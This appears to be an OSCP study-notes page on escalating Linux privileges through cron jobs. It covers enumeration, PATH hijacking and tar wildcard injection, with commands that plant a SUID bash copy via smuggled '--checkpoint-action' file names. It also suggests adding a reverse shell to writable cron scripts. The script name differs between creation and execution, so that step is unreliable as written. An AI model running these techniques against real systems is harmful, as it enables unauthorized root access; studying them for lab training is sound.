> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/linux-privilege-escalation/cron-jobs.md).

# Cron jobs

{% embed url="<https://swisskyrepo.github.io/InternalAllTheThings/redteam/escalation/linux-privilege-escalation/#cron-jobs>" %}

Read the cron jobs then read permissions on any scripts running

```
cat /etc/crontab
```

{% hint style="info" %}
In CTF situations, if there are any custom scripts as cron  jobs they're most likely there for a reason, especially ones running as root.
{% endhint %}

Systemd timers could aslo be running which essentially do the same thing

```
systemctl list-timers --all
```

## Cron Paths

If the path of the script isn't a the full file path it will check the first path in the PATH variable for it first

{% embed url="<https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2F15vVZIEpvXFIyeHYu5Uy%2Fimage.png?alt=media&token=06b19b4e-eb0f-43e4-acbd-48f53d6620a8>" %}

## Cron Wildcards

If we only have read permissions on a script but it is using a wildcard with another command, we can make that command run something malicious instead

{% embed url="<https://files.gitbook.com/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FUczSr73L34emqNMDOxDg%2Fuploads%2Fc3zqe2PjtUiuKhVR3O3l%2Fimage.png?alt=media&token=558a2848-e5d2-4320-bd46-278537ee8ecd>" %}

With tar specifically we can make it run a script using touch and checkpoints

<pre><code>echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' > privme.sh
<strong>touch -- "--checkpoint=1"
</strong>touch -- "--checkpoint-action=exec=sh privmeme.sh"
</code></pre>

## Cron File Overwrites

Check the file permissions on the scheduled script and add a reverse shell to it
